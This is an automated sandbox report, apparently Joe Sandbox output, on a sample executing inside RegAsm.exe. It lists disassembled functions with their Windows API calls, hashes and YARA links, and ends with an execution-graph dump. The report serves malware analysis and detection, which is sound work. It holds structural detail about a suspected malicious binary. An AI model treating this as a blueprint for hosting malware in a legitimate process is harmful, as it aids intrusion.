                                                                                                                                                                                                                      • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                                                      Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                                                                                      • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                                      • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                                                      Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009206
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009218
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                                      • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                                                      Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005381
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005394
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                                      • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                                                      Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                      • API String ID: 2506810119-1068371695
                                                                                                                                                                                                                      • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                                      • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                                                      Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeHandleLibraryModule
                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                      • API String ID: 662261464-1276376045
                                                                                                                                                                                                                      • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                                      • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                                                      Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                                                      • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                                      • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                                                      Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseHandleReadSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3642004256-0
                                                                                                                                                                                                                      • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                                      • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                                                      Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                                                        • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                                                                        • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                                                        • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                                                                      • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                                      • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                                                      Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                      • String ID: : $Se.
                                                                                                                                                                                                                      • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                      • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                                                      Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                                                        • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                                                                                      • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                                      • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:5.6%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                      Signature Coverage:1.8%
                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                      Total number of Limit Nodes:54
                                                                                                                                                                                                                      execution_graph 37716 4466f4 37735 446904 37716->37735 37718 446700 GetModuleHandleA 37721 446710 __set_app_type __p__fmode __p__commode 37718->37721 37720 4467a4 37722 4467ac __setusermatherr 37720->37722 37723 4467b8 37720->37723 37721->37720 37722->37723 37736 4468f0 _controlfp 37723->37736 37725 4467bd _initterm GetEnvironmentStringsW _initterm 37726 44681e GetStartupInfoW 37725->37726 37727 446810 37725->37727 37729 446866 GetModuleHandleA 37726->37729 37737 41276d 37729->37737 37733 446896 exit 37734 44689d _cexit 37733->37734 37734->37727 37735->37718 37736->37725 37738 41277d 37737->37738 37780 4044a4 LoadLibraryW 37738->37780 37740 412785 37741 412789 37740->37741 37786 414b81 37740->37786 37741->37733 37741->37734 37744 4127c8 37790 412465 memset ??2@YAPAXI 37744->37790 37746 4127ea 37802 40ac21 37746->37802 37751 412813 37820 40dd07 memset 37751->37820 37752 412827 37825 40db69 memset 37752->37825 37755 412822 37847 4125b6 ??3@YAXPAX DeleteObject 37755->37847 37757 40ada2 _wcsicmp 37758 41283d 37757->37758 37758->37755 37761 412863 CoInitialize 37758->37761 37830 41268e 37758->37830 37760 412966 37848 40b1ab free free 37760->37848 37846 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37761->37846 37765 41296f 37849 40b633 37765->37849 37767 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37772 412957 CoUninitialize 37767->37772 37777 4128ca 37767->37777 37772->37755 37773 4128d0 TranslateAcceleratorW 37774 412941 GetMessageW 37773->37774 37773->37777 37774->37772 37774->37773 37775 412909 IsDialogMessageW 37775->37774 37775->37777 37776 4128fd IsDialogMessageW 37776->37774 37776->37775 37777->37773 37777->37775 37777->37776 37778 41292b TranslateMessage DispatchMessageW 37777->37778 37779 41291f IsDialogMessageW 37777->37779 37778->37774 37779->37774 37779->37778 37781 4044f3 37780->37781 37785 4044cf FreeLibrary 37780->37785 37783 404507 MessageBoxW 37781->37783 37784 40451e 37781->37784 37783->37740 37784->37740 37785->37781 37787 414b8a 37786->37787 37788 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37786->37788 37853 40a804 memset 37787->37853 37788->37744 37791 4124e0 37790->37791 37792 412505 ??2@YAPAXI 37791->37792 37793 41251c 37792->37793 37798 412521 37792->37798 37875 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37793->37875 37864 444722 37798->37864 37801 41259b wcscpy 37801->37746 37880 40b1ab free free 37802->37880 37806 40ad4b 37815 40ad76 37806->37815 37904 40a9ce 37806->37904 37807 40a9ce malloc memcpy free free 37808 40ac5c 37807->37808 37808->37806 37808->37807 37810 40ace7 free 37808->37810 37808->37815 37884 40a8d0 37808->37884 37896 4099f4 37808->37896 37810->37808 37814 40a8d0 7 API calls 37814->37815 37881 40aa04 37815->37881 37816 40ada2 37817 40adaa 37816->37817 37818 40adc9 37816->37818 37817->37818 37819 40adb3 _wcsicmp 37817->37819 37818->37751 37818->37752 37819->37817 37819->37818 37909 40dce0 37820->37909 37822 40dd3a GetModuleHandleW 37914 40dba7 37822->37914 37826 40dce0 3 API calls 37825->37826 37827 40db99 37826->37827 37986 40dae1 37827->37986 38000 402f3a 37830->38000 37832 412766 37832->37755 37832->37761 37833 4126d3 _wcsicmp 37834 4126a8 37833->37834 37834->37832 37834->37833 37836 41270a 37834->37836 38034 4125f8 7 API calls 37834->38034 37836->37832 38003 411ac5 37836->38003 37846->37767 37847->37760 37848->37765 37850 40b640 37849->37850 37851 40b639 free 37849->37851 37852 40b1ab free free 37850->37852 37851->37850 37852->37741 37854 40a83b GetSystemDirectoryW 37853->37854 37855 40a84c wcscpy 37853->37855 37854->37855 37860 409719 wcslen 37855->37860 37858 40a881 LoadLibraryW 37859 40a886 37858->37859 37859->37788 37861 409724 37860->37861 37862 409739 wcscat LoadLibraryW 37860->37862 37861->37862 37863 40972c wcscat 37861->37863 37862->37858 37862->37859 37863->37862 37865 444732 37864->37865 37866 444728 DeleteObject 37864->37866 37876 409cc3 37865->37876 37866->37865 37868 412551 37869 4010f9 37868->37869 37870 401130 37869->37870 37871 401134 GetModuleHandleW LoadIconW 37870->37871 37872 401107 wcsncat 37870->37872 37873 40a7be 37871->37873 37872->37870 37874 40a7d2 37873->37874 37874->37801 37874->37874 37875->37798 37879 409bfd memset wcscpy 37876->37879 37878 409cdb CreateFontIndirectW 37878->37868 37879->37878 37880->37808 37882 40aa14 37881->37882 37883 40aa0a free 37881->37883 37882->37816 37883->37882 37885 40a8eb 37884->37885 37886 40a8df wcslen 37884->37886 37887 40a906 free 37885->37887 37888 40a90f 37885->37888 37886->37885 37892 40a919 37887->37892 37889 4099f4 3 API calls 37888->37889 37889->37892 37890 40a932 37894 4099f4 3 API calls 37890->37894 37891 40a929 free 37893 40a93e memcpy 37891->37893 37892->37890 37892->37891 37893->37808 37895 40a93d 37894->37895 37895->37893 37897 409a41 37896->37897 37898 4099fb malloc 37896->37898 37897->37808 37900 409a37 37898->37900 37901 409a1c 37898->37901 37900->37808 37902 409a30 free 37901->37902 37903 409a20 memcpy 37901->37903 37902->37900 37903->37902 37905 40a9e7 37904->37905 37906 40a9dc free 37904->37906 37908 4099f4 3 API calls 37905->37908 37907 40a9f2 37906->37907 37907->37814 37908->37907 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37822 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37939 4447f4 37937->37939 37938 40dc1b 37938->37921 37938->37922 37939->37938 37940 444807 ??2@YAPAXI 37939->37940 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37946 4448a7 37946->37943 37946->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37938 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37755 37976->37946 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40db63 37988->37989 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37990 37989->37757 37997 40d65d GetPrivateProfileStringW 37990->37997 37992 40db3e 37998 40d65d GetPrivateProfileStringW 37992->37998 37994 40db4f 37999 40d65d GetPrivateProfileStringW 37994->37999 37996->37988 37997->37992 37998->37994 37999->37989 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37834 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c 